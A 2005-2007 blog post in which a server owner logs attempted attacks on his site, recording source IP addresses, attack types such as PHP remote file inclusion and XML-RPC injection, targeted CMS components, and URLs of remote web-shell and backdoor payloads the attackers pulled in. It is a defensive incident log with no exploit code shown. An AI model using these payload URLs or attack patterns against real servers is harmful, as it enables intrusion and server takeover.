| Su | Mo | Tu | We | Th | Fr | Sa |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
| 31 |
Browse archivesRandom Media
Council Office Bermingham
Recent blog posts
|
The Return of The Cracker Kiddy aka Script Kiddy12 May 2006: I have been a little lazy in reporting the script kiddo incidents, but now back. Seems I gotta find a way to automate this crap. 19 Feb 2006: Things seem to have slowed down, except for an occasional attempt, nothing much. Seems the kids have found better ways to hide or are busy somewhere else. Anyway I will do a detailed check in a day or so. IMPORTANT (22 Jan 2006): Now I will not manually update this list. For full exposure please wait till I have time to automate this process. Here you will find a list of kiddies/ ankle biters who attempted some sort of behavior I found annoying (cracking attempts). And if they are listed here that basically means they were unsuccessful (I hope so). If they had been successful I would not be sitting here listing their names but rather going back to the archives and restoring the server. Well I am keeping my fingers crossed and server updated. Lets see how long the rat race lasts. This is in the form of a log, most recent events on top of the page. Many old events have not been listed. Some events will not be listed unless I find it really annoying or interesting. WARNING: The information may be totally baseless and incorrect as I am relying on the information provided by my computer. Don't trust anything. Also note that the tools may have been removed from the cracker dump site. NOTE: BTW if you are looking for more information on how to become a script kiddies and own a server read this The Official Script Kiddy Howto. Tuesday, May 22, 2007 - 11:56pm Appears to be Orignating from: 216.120.237.36 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component FacileForm Crack Tool Download Site: http://gnuworld.evolink.ro/xxx/. So what this guy is doing first it tests for a simple script insertion using this very innocent looking script. If success, then tries the actual payload. Saturday, May 12, 2007 - 9:13pm Appears to be Orignating from: 138.48.4.37 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component FacileForm Crack Tool Download Site: http://lamerma.com.ve/n00gr00d.txt. Just a lame PHP code inclusion test. Saturday, May 12, 2007 - 2:50pm Appears to be Orignating from: 88.84.133.139 , 209.172.44.132 and 193.148.45.19 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla component facileform Crack Tool Download Site: http://www.x666-01.nm.ru/57. Saturday, May 12, 2007 - 9:12am Appears to be Orignating from: 217.172.182.28 Type of Attack: PHP Remote file inclusion Target Applications: 4nGallery Crack Tool Download Site: http://www.nbbsworld.de/downloads/files/ciola.txt. Lame PHP code inclusion test. Saturday, May 12, 2007 - 9:02am Appears to be Orignating from: 87.28.206.35 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://lamerma.com.ve/n00gr00d.txt. Just a lame PHP code inclusion test. Friday, March 30, 2007 - 12:46am Appears to be Orignating from: 84.244.132.110 Type of Attack: PHP Remote file inclusion Target Applications: 4nGallery Crack Tool Download Site: http://rvbnet.nl/administrator/components/com_facileforms/change.txt. Saturday, March 24, 2007 - 8:47pm Appears to be Orignating from: 207.58.184.58 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://www.xboxchannel.altervista.org/AreaRiservata.txt. Friday, March 23, 2007 - 11:37pm Appears to be Orignating from: 217.173.42.194 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://oppium.interfree.it/id.txt. Saturday, March 17, 2007 - 8:09am Appears to be Orignating from: 81.214.173.3 Type of Attack: PHP Remote file inclusion Target Applications: 4nAlbum Crack Tool Download Site: http://hapg.org/isko.dat. Friday, March 16, 2007 - 9:06pm Appears to be Orignating from: 201.50.21.80 Type of Attack: PHP Remote file inclusion Target Applications: Mambo Module Forum http://wildbeats.net/cmd.txt. Friday, March 16, 2007 - 3:19am Appears to be Orignating from: 209.200.229.202 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://www.nykola.ch/Sefirot_r0x/r57.txt. Thursday, March 15, 2007 - 10:00pm Appears to be Orignating from: 208.101.40.162 Type of Attack: PHP Remote file inclusion Target Applications: 4nAlbum Crack Tool Download Site: http://www.middleriver.k12.mn.us/poll/db/ind.jpg (Right click and view source, it is not a JPG). Saturday, January 13, 2007 - 2:08am Appears to be Orignating from: 201.32.246.172 Type of Attack: PHP Remote file inclusion Target Applications: Coppermine Crack Tool Download Site: http://wildbeats.net/cmd.txt. Friday, January 5, 2007 - 8:39pm, 10:01pm Appears to be Orignating from: 201.32.188.94 and 201.32.208.153 Type of Attack: PHP Remote file inclusion Target Applications: PHPBB Forum and Coppermine Crack Tool Download Site: http://wildbeats.net/cmd.txt. The unusual thing about the crack tool in question is the advertising system in place, maybe the original script kiddy wants to make some money by displaying advertisements inside the crack tool script. Target audiences for the advertisements "Script Kiddies". Thursday, December 28, 2006 - 04:56 and Saturday, December 30, 2006 - 00:05 Appears to be Orignating from: 85.98.78.104 and 81.215.241.87 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component BaBackup (Tar.php) Crack Tool Download Site: http://www.yourcopysolution.com/tool20.dat. Thursday, December 28, 2006 - 03:15, 18:04, 18:18 Appears to be Orignating from: 70.87.63.234 , 193.25.197.81 and 70.87.63.234 Type of Attack: PHP Remote file inclusion TEST Target Applications: Mambo/ Joomla Component Simpleboard Crack Tool Download Site: http://thebesthack.altervista.org/soka.txt. Sunday, December 17, 2006 - 18:45 Appears to be Orignating from: 85.101.25.114 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component Remository Crack Tool Download Site: http://www.nyers.hu/cmd.txt. Friday, December 8, 2006 - 20:08 Appears to be Originating from: 70.87.63.234 Type of Attack: PHP Remote file inclusion Target Applications: com_remository for Mambo/ Joomla Crack Tool Download Site: http://thebesthack.altervista.org/soka.txt. Though not exactly a crack tool, but a possible script for testing PHP code injection. Saturday, November 25, 2006 - 00:28 - 00:24 Appears to be Originating from: 85.99.183.229 Type of Attack: PHP Remote file inclusion Target Applications: a4Album Photo Album and MyEGallery Crack Tool Download Site: http://hackharekat.com/shell/r57.txt and http://www.nyers.hu/cmd.txt. Tuesday, November 14, 2006 - 03:29 Appears to be Originating from: 81.177.34.236 Type of Attack: PHP Remote file inclusion Target Applications: Simple Board Component for Mambo/ Joomla Crack Tool Download Site: http://it.ismico.org/cache/rmod.txt. Webmaster has been informed using the available online contact form. Tuesday, October 24, 2006 - 23:12 Appears to be Orignating from: 83.223.107.18 Type of Attack: PHP Remote file inclusion Target Applications: Simple Board Component for Mambo/ Joomla Crack Tool Download Site: http://realhack.altervista.org/iniez.txt. This is not actually a crack script, but the kiddo seems to be testing the waters. Monday, October 23, 2006 - 04:48, 04:51, 05:05 Appears to be Orignating from: 81.214.161.234 Type of Attack: PHP Remote file inclusion Target Applications: Mambo Weather module, Simple Board Component, Remository component for Mambo/ Joomla Crack Tool Download Site: http://hbags.com/tool25.dat. Friday, October 20, 2006 - 22:48, 23:12 Appears to be Orignating from: 85.101.78.207 Type of Attack: PHP Remote file inclusion Target Applications: PHP Nuke 4nAlbums Module Crack Tool Download Site: http://www.nyers.hu/cmd.txt. Thursday, September 28, 2006 - 16:53 to 20:47 Appears to be Orignating from: 200.238.73.213 Appears to be Orignating from: 200.153.146.120 Appears to be Orignating from: 148.245.181.4 Type of Attack: PHP Remote file inclusion Target Applications: PHP BB Forum/ My EGallery/ Coppermine Crack Tool Download Site: http://simssuisse.com/cmd.txt. Thursday, September 28, 2006 - 09:18 Appears to be Orignating from: 148.245.181.4 Type of Attack: PHP Remote file inclusion Target Applications: PHP BB Forum Crack Tool Download Site: http://simssuisse.com/cmd.txt. Thursday, September 28, 2006 - 04:25 Appears to be Orignating from: 81.215.245.251 Type of Attack: PHP Remote file inclusion Target Applications: Help Management Componente for Joomla/ Mambo Crack Tool Download Site: http://addictivebehavior.net/tool25.dat. Tuesday, September 26, 2006 - 17:09 Appears to be Orignating from: 81.214.161.144 Type of Attack: PHP Remote file inclusion Target Applications: Server Stat Componente for Joomla/ Mambo Crack Tool Download Site: http://andyburnett.net/tool20.dat. Sunday, September 24, 2006 - 16:02 Orignating from: 195.225.177.6 Type of Attack: Blog Comment Spammer (On an average 100-200 comment per day, I think i will have to block them) Target Applications: Blog Comments Friday, August 4, 2006 - 07:57 Appears to be Orignating from: 85.98.83.41 Type of Attack: PHP Remote file inclusion Target Applications: Forum Componente for Joomla/ Mambo Crack Tool Download Site: http://61.1.197.244/x/tool25.txt. Friday, August 4, 2006 - 03:48 Appears to be Orignating from: 201.79.240.176 Type of Attack: PHP Remote file inclusion Target Applications: Coppermine Photo Gallery Crack Tool Download Site: http://www.sdpescadoresteruel.com/cmd.txt. Thursday, August 3, 2006 - 05:21 Appears to be Orignating from: 201.50.186.69 Type of Attack: PHP Remote file inclusion Tuesday, August 1, 2006 - 23:02 to Wednesday, August 2, 2006 - 20:29 Appears to be Orignating from: 81.215.179.76 Appears to be Orignating from: 85.98.83.132 Type of Attack: PHP Remote file inclusion Wednesday, July 19, 2006 - 08:37 Appears to be Orignating from: 85.98.99.33 Type of Attack: PHP Remote file inclusion Target Applications: SMF and Loudmouth for Mambo/ joomla Crack Tool Download Site: http://61.1.197.244/x/tool25.txt. Tuesday, July 18, 2006 - 17:26 Appears to be Orignating from: 85.98.98.150 Type of Attack: PHP Remote file inclusion Target Applications: Simpleboard and Sitemap for Mambo/ joomla Crack Tool Download Site: http://xpl.netmisphere2.com/tool25.dot, save as text file to view code. Tuesday, July 18, 2006 - 02:20 Appears to be Orignating from: 201.50.194.212 Type of Attack: PHP Remote file inclusion Target Applications: PHPBB for Mambo/ joomla Crack Tool Download Site: http://portal.runet.hu/albums/cmd.txt. Sunday, July 9, 2006 - 04:23 Appears to be Orignating from: 85.98.112.104 Type of Attack: PHP Remote file inclusion Target Applications: PHP BB and SImple Board componenet for Mambo/ joomla Crack Tool Download Site: http://www.freewebtown.com/england90/tool25.gif, save as text file to view code.
Saturday, July 8, 2006 - 10:52 Appears to be Orignating from: 201.79.238.153 Type of Attack: PHP Remote file inclusion Target Applications: Coppermine Photo Gallery, PHP BB Crack Tool Download Site: http://portal.runet.hu/albums/cmd.txt
Saturday, July 8, 2006 - 07:08 Appears to be Orignating from: 85.98.81.34 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla CMS module Gallery Crack Tool Download Site: http://www.ajadp.net/tool25.dat
Tuesday, July 4, 2006 - 10:55 Appears to be Orignating from: 200.165.184.59 Type of Attack: PHP Remote file inclusion Target Applications: JAF CMS (http://jaf-cms.sourceforge.net/) Crack Tool Download Site: http://www.gewerbeverein-flachsmeer.de/modules/4nAlbum/album/cmd.txt
Sunday, June 4, 2006 - 23:30 Target Applications: awstat Appears to be Orignating from: 213.206.91.9
Unknown Date Target Applications: PHP postnuke, myegallery, phpBB, mambo etc etc Appears to be Orignating from: 64.90.177.252 85.214.38.146 81.169.134.50 217.171.192.14 82.165.251.158 80.154.33.74 69.10.137.228 58.26.6.6 85.119.158.42 and many other Crack Tool Download Site: http://usareother.tripod.com/asc/tool.gif (Right click, save and open in some text editor) http://ns.powernet-bg.net/maps/cmd.txt http://81.56.218.236/cmd.txt http://ns.powernet-bg.net/maps/but2.txt (A perl script to control a server using IRC) http://81.56.218.236/mambes.txt
Thursday, March 16, 2006 - 22:28 Target Applications: PHP postnuke, myegallery, phpBB, etc etc Appears to be Orignating from: 201.9.103.58 Crack Tool Download Site: http://bkbhq.com/images/cmd.txt http://200.72.130.29/cmd.gif (right click and save as, then view in a text editor)
Tuesday, December 20, 2005 - 21:45 to Wednesday, December 21, 2005 - 22:31 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat, PHPbb etc etc Appears to be Orignating from: 72.29.102.139 Appears to be Orignating from: 211.100.12.103 Appears to be Orignating from: 218.3.207.44 Appears to be Orignating from: 24.139.31.72 Appears to be Orignating from: 24.77.190.47 Appears to be Orignating from: 24.130.166.124 All too common attacks with all kinds of permutations and combinations. The favourite crack tool dump site is till date the most popular http://81.174.26.111/cmd.gif and a few other that I didnt had the time to check.
Tuesday, December 20, 2005 - 20:32 Appears to be Orignating from: 61.66.208.8 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat, PHPbb etc etc Crack Tool Download Site: http://200.72.130.29/cmd.gif and 66.235.205.212/back
Tuesday, December 20, 2005 - 13:36 Appears to be Orignating from: 219.136.249.133 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat etc etc
Tuesday, December 20, 2005 - 07:32 Appears to be Orignating from: 200.27.70.37 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat etc etc
Tuesday, December 20, 2005 - 00:11 Appears to be Orignating from: 72.29.71.179 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat, PHPbb etc etc Crack Tool Download Site: http://81.174.26.111/cmd.gif (seems to have been removed now, it was there a few hours back)
Monday, December 19, 2005 - 23:50 Appears to be Orignating from: 82.108.214.170 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat etc
Monday, December 19, 2005 - 19:12 Appears to be Orignating from: 80.81.4.168 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat etc
Monday, December 19, 2005 - 06:30 Appears to be Orignating from: 195.134.100.14 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpres, phpgroupware, awstat, PHPbb etc etc Crack Tool Download Site: http://81.174.26.111/cmd.gif (seems to have been removed now, it was there) Exactly Similar Attacks Have been Carried out by the following:
Sunday, December 11, 2005 - 06:03 Appears to be Orignating from: 81.88.224.91 Type of Attack: PHP XML RPC code injection Target Applications: mambo, wordpres, phpgroupware etc etc
Friday, December 2, 2005 - 01:43 Appears to be Orignating from: 82.70.213.245 Type of Attack: PHP xmlrpc code injection Target Application: wordpress, drupal, pawon(?) and other random application that use xmlrpc Tried What: Tried the xmlrpc code injection.
Tuesday, November 22, 2005 - 08:34 Appears to be Orignating from: 207.224.30.187 Type of Attack: PHP XSS Target Application: awstat Tried What: Download and install of a backdore named listen from 24.224.174.18 (this host right now seems down, so not sure if this is the dump site of kiddy)
Saturday, November 19, 2005 - 09:56 to 15:06 Hrs Appears to be Originating From: 65.203.134.100 Type of Attack: PHP XSS Target Application: Mambo and other CMS Crack Tool Download Site: http://www.phantasmairc.hpgvip.ig.com.br/CMD.txt http://69.16.196.38/~doctord/.../t.txt This Seems to have been removed. http://83.149.106.31/~max4/.../ I have reported regarding the above dump site to an email address, that I obtained from the whois information for the domian name associated with the above IP, but still nothing even after 6 days of reporting the issue. Well...
3465 reads
Post new comment |
![[I am an FSF Associate Member]](files/fsfmember.png "[I am an FSF Associate Member]"){kind=small}
